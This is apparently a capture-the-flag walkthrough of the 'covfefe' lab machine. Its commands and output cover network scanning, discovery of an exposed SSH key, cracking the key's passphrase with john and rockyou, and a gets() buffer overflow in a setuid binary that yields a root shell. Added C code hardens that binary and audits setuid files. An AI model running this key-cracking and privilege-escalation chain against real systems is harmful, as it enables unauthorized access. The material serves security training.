**1. Locating the target's address**
Before probing, make sure the attacking machine's virtual network adapter is in bridged mode. (On the reasons for choosing this VM network mode, see the separate note.)
root@kali:~# netdiscover -r 192.168.1.1/24
A short explanation:
1. Netdiscover is an active/passive ARP reconnaissance tool. It is particularly useful on wireless networks that do not run DHCP. Netdiscover sweeps IP addresses on the network and identifies live hosts either by checking ARP replies or by listening for the ARP requests those hosts send; in short, it discovers the hosts on the local LAN.
2. DHCP (Dynamic Host Configuration Protocol) is typically used in larger LAN environments. Its main role is the centralized management and allocation of IP addresses, so that hosts on the network dynamically obtain an IP address, gateway address, DNS server addresses and related information, which also improves address utilization.
DHCP uses a client/server model, and the dynamic assignment of host addresses is driven by the host itself: only when the DHCP server receives an address request from a host does it send back the address configuration information, which is how host addressing is configured dynamically.
**2. Testing connectivity between the attacking machine and the target**
root@kali:~# ping
This shows that the two machines can reach each other; we now proceed with the exercise.
**3. Port scanning**
root@kali:~# nmap -sV 192.168.1.107
Scan result:
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2019-07-04 21:37 CST
Nmap scan report for 192.168.1.107
Host is up (0.00013s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10 (protocol 2.0)
80/tcp open http nginx 1.10.3
31337/tcp open http Werkzeug httpd 0.11.15 (Python 3.5.3)
MAC Address: 08:00:27:50:7F:AC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.79 seconds
**4. Analysing the scan results**
http://192.168.1.107:31337/
Viewing the page source gives no useful information.
**5. Finding hidden files**
root@kali:~# dirb http://192.168.1.107:31337/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Jul 5 17:25:10 2019
URL_BASE: http://192.168.1.107:31337/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.107:31337/ ----
+ http://192.168.1.107:31337/.bash_history (CODE:200|SIZE:19)
+ http://192.168.1.107:31337/.bashrc (CODE:200|SIZE:3526)
+ http://192.168.1.107:31337/.profile (CODE:200|SIZE:675)
+ http://192.168.1.107:31337/.ssh (CODE:200|SIZE:43)
+ http://192.168.1.107:31337/robots.txt (CODE:200|SIZE:70)
-----------------
END_TIME: Fri Jul 5 17:25:24 2019
DOWNLOADED: 4612 - FOUND: 5
Five results are found.
First, open the sensitive file (robots.txt):
User-agent: *
Disallow: /.bashrc
Disallow: /.profile
Disallow: /taxes
Opening the sensitive files yields the flag value:
We find the private key and public key files. There is no need to download the public key here, because the public key already sits on the server.
**6. Logging in over SSH**
root@kali:~# cd 桌面/
root@kali:~/桌面# ls -alh
总用量 16K
drwxr-xr-x 2 root root 4.0K 7月 5 17:32 .
drwxr-xr-x 29 root root 4.0K 7月 5 17:32 ..
-r-------- 1 root root 395 7月 5 17:32 authorized_keys
-r-------- 1 root root 1.8K 7月 5 17:31 id_rsa
root@kali:~/桌面# chmod 777 id_rsa
root@kali:~/桌面#
Set permissions on the key file, then log in to the SSH service with the private key.
Even with the private key in hand, logging in still asks for a passphrase:
root@kali:~/桌面# ssh -i id_rsa [email protected]
The authenticity of host '192.168.1.107 (192.168.1.107)' can't be established.
ECDSA key fingerprint is SHA256:5Tmg/FD7Iga/sFY/1z4etq44S8/bmokfg3R3VyjHtVM.
Are you sure you want to continue connecting (yes/no)? y
Please type 'yes' or 'no': yes
Warning: Permanently added '192.168.1.107' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Cracking the SSH private key's passphrase:
root@kali:~/桌面# ssh2john id_rsa >tsacrack // convert the key into a form john understands
root@kali:~/桌面# ls -al
总用量 20
drwxr-xr-x 2 root root 4096 7月 5 17:44 .
drwxr-xr-x 29 root root 4096 7月 5 17:32 ..
-r-------- 1 root root 395 7月 5 17:32 authorized_keys
-rw------- 1 root root 1766 7月 5 17:31 id_rsa
-rw-r--r-- 1 root root 3553 7月 5 17:46 tsacrack // conversion done
root@kali:~/桌面# zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules tsacrack // crack the passphrase
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA 32/64])
Press Ctrl-C to abort, or send SIGUSR1 to john process for status
starwars (id_rsa ) // cracked passphrase
1g 0:00:00:00 9.090g/s 6081p/s 6081c/s 6081C/s starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/桌面# ssh -i id_rsa [email protected] // log in over SSH
Enter passphrase for key 'id_rsa':
Linux covfefe 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
simon@covfefe:~$
simon@covfefe:~$ pwd // pwd is short for Print Working Directory: it prints the absolute path of the current working directory, which is handy whenever you are unsure where you are.
/home/simon
simon@covfefe:~$ ls
http_server.py robots.txt
simon@covfefe:~$ cd /root // /root is the root user's home directory; other users, lacking root privileges, cannot read it
simon@covfefe:/root$ ls
flag.txt read_message.c
simon@covfefe:/root$ cat flag.txt
cat: flag.txt: Permission denied
simon@covfefe:/root$ find / -perm -4000 2>/dev/null // find setuid files, i.e. files that execute with root privileges
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/local/bin/read_message // this binary corresponds to read_message.c under /root; let's take a look at it.
/bin/umount
/bin/su
/bin/mount
/bin/ping
simon@covfefe:/root$ cat read_message.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h> // needed for strncmp; missing from the original listing
#include <unistd.h>
// You're getting close! Here's another flag:
// flag2{use_the_source_luke}
int main(int argc, char *argv[]) {
    char program[] = "/usr/local/sbin/message";
    char buf[20]; // 20-byte stack buffer filled by gets(): the buffer-overflow target
    char authorized[] = "Simon";
    printf("What is your name?\n");
    gets(buf);
    // Only compare first five chars to save precious cycles:
    if (!strncmp(authorized, buf, 5)) {
        printf("Hello %s! Here is your message:\n\n", buf);
        // This is safe as the user can't mess with the binary location:
        execve(program, NULL, NULL);
    } else {
        printf("Sorry %s, you're not %s! The Internet Police have been informed of this violation.\n", buf, authorized);
        exit(EXIT_FAILURE);
    }
}
simon@covfefe:/root$ read_message
What is your name?
simonAAAAAAAAAAAAAAA/bin/sh
Sorry simonAAAAAAAAAAAAAAA/bin/sh, you're not Simon! The Internet Police have been informed of this violation.
simon@covfefe:/root$ read_message
What is your name?
SimonAAAAAAAAAAAAAAA/bin/sh
Hello SimonAAAAAAAAAAAAAAA/bin/sh! Here is your message:
# pwd // we now have a shell in /root.
/root
# cat flag.txt
You did it! Congratulations, here's the final flag:
flag3{das_bof_meister}
#
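The root shell above comes from two defects in read_message.c: gets() writes past the 20-byte buf, and strncmp(..., 5) accepts anything that begins with "Simon", so an overlong name is both accepted and overruns the buffer. The hardened rewrite below is an added example, not code from the covfefe machine or from the original post. It keeps the page's buffer size, authorized name and program path, and assumes (hypothetically) that /usr/local/sbin/message does not itself need root, so the setuid privilege is dropped before the exec.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NAME_BUF 20                 /* same buffer size as the original read_message.c */
static const char authorized[] = "Simon";
static const char program[] = "/usr/local/sbin/message";

/* Replacement for gets(): read one line into buf, at most n-1 bytes.
 * Returns 1 if a complete line fitted, 0 if the line was longer than the
 * buffer (the remainder is discarded) or nothing could be read. It never
 * writes past buf, so there is nothing left to overflow. */
int read_name(char *buf, size_t n, FILE *in) {
    if (n == 0 || fgets(buf, (int)n, in) == NULL)
        return 0;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 1;
    }
    if (feof(in))                   /* final line without a newline: still complete */
        return 1;
    /* No newline and no EOF: the line exceeded the buffer. Refuse it rather
     * than accepting a silently truncated value, and drain the rest of the
     * line so it cannot be mistaken for the next answer. */
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;
    buf[0] = '\0';
    return 0;
}

/* Exact comparison of the whole name. The original strncmp(..., 5) accepted
 * any input starting with "Simon", which is exactly what the overlong
 * "SimonAAAA..." input relied on. */
int name_is_authorized(const char *name) {
    return strcmp(name, authorized) == 0;
}

int main(void) {
    char buf[NAME_BUF];
    printf("What is your name?\n");
    if (!read_name(buf, sizeof buf, stdin)) {
        fprintf(stderr, "Name too long or missing (max %d characters).\n", NAME_BUF - 1);
        return EXIT_FAILURE;
    }
    if (!name_is_authorized(buf)) {
        printf("Sorry %s, you're not %s!\n", buf, authorized);
        return EXIT_FAILURE;
    }
    /* Assumption: the message program does not need root, so give up the
     * setuid privilege before handing control to it. */
    if (setuid(getuid()) != 0) {
        perror("setuid");
        return EXIT_FAILURE;
    }
    printf("Hello %s! Here is your message:\n\n", buf);
    fflush(stdout);
    char *const exec_argv[] = { (char *)program, NULL };
    char *const exec_envp[] = { "PATH=/usr/bin:/bin", NULL };   /* fixed, minimal environment */
    execve(program, exec_argv, exec_envp);
    perror("execve");               /* only reached if the exec failed */
    return EXIT_FAILURE;
}
```

read_name refuses a line that does not fit instead of truncating it, and the exec receives an explicit argv and a fixed environment rather than execve(program, NULL, NULL), whose NULL argv POSIX does not define; the caller's environment is not inherited into the privileged child either.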
Summary:
netdiscover -r 192.168.1.1/24 // scan for live hosts on the LAN
ping 192.168.1.107 // test connectivity
dirb http://192.168.1.107:31337/ // look for hidden directories
ssh -i <private key> <user>@<ip address> // log in over SSH
ssh2john <private key file> > tsacrack // convert the private key into a file john understands
zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules tsacrack // crack the passphrase
The first file there is the wordlist bundled with Kali.
pwd // show the current path
find / -perm -4000 2>/dev/null
or
find /home -user root -ls
/dev/null in Linux
Suppressing standard error:
[root@zhoucentos log]# rm filename1
rm: 无法删除"filename1": 没有那个文件或目录
[root@zhoucentos log]# rm filename1 2>/dev/null
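The `find / -perm -4000 2>/dev/null` sweep above is also the first thing a defender should run on a box like this, but a raw list only becomes useful when compared against a baseline. The program below is an added example, not code from the original post: it generalizes that check by walking a tree with nftw() and reporting every setuid-root regular file that is not on an expected list. The baseline is constructed from the find output shown earlier in this walkthrough and must be adjusted per host; the report struct and function names are this example's own.

```c
#define _XOPEN_SOURCE 700
#include <ftw.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Baseline of setuid-root binaries expected on this image. Constructed from
 * the walkthrough's own `find / -perm -4000` output; tailor it per host. */
static const char *const expected_setuid[] = {
    "/usr/bin/chsh", "/usr/bin/passwd", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/openssh/ssh-keysign",
    "/bin/umount", "/bin/su", "/bin/mount", "/bin/ping",
    NULL
};

struct suid_report {
    int setuid_files;      /* regular files with the setuid bit, any owner */
    int setuid_root;       /* of those, owned by uid 0 (the ones that matter) */
    int unexpected_root;   /* setuid-root files missing from the baseline */
};

/* Equivalent of find's -perm -4000, restricted to regular files. */
int has_setuid_bit(const struct stat *st) {
    return S_ISREG(st->st_mode) && (st->st_mode & S_ISUID) != 0;
}

int is_expected(const char *path) {
    for (size_t i = 0; expected_setuid[i] != NULL; i++)
        if (strcmp(path, expected_setuid[i]) == 0)
            return 1;
    return 0;
}

static struct suid_report *current;   /* nftw() offers no user-data pointer */

static int visit(const char *path, const struct stat *st, int type, struct FTW *ftw) {
    (void)ftw;
    if (type != FTW_F || !has_setuid_bit(st))   /* FTW_F: stat() succeeded on a file */
        return 0;
    current->setuid_files++;
    if (st->st_uid == 0) {
        current->setuid_root++;
        if (!is_expected(path)) {
            current->unexpected_root++;
            printf("UNEXPECTED setuid-root binary: %s\n", path);
        }
    }
    return 0;                                   /* keep walking */
}

/* Walk `root` without following symlinks or crossing mount points and fill
 * `out`. Returns 0 on success, -1 if nftw() failed. */
int audit_setuid(const char *root, struct suid_report *out) {
    memset(out, 0, sizeof *out);
    current = out;
    int rc = nftw(root, visit, 32, FTW_PHYS | FTW_MOUNT);
    current = NULL;
    return rc;
}

int main(int argc, char *argv[]) {
    const char *root = argc > 1 ? argv[1] : "/";
    struct suid_report r;
    if (geteuid() != 0)
        fprintf(stderr, "warning: not root, unreadable directories will be skipped\n");
    if (audit_setuid(root, &r) != 0) {
        perror("nftw");
        return EXIT_FAILURE;
    }
    printf("setuid files: %d, setuid-root: %d, unexpected setuid-root: %d\n",
           r.setuid_files, r.setuid_root, r.unexpected_root);
    return r.unexpected_root != 0 ? EXIT_FAILURE : EXIT_SUCCESS;
}
```

Run it as root against each mounted filesystem (FTW_MOUNT deliberately stops at mount boundaries, so `/` alone does not cover a separate `/usr`), and treat a non-zero exit as a finding to investigate: on the covfefe image, /usr/local/bin/read_message would be the one entry reported.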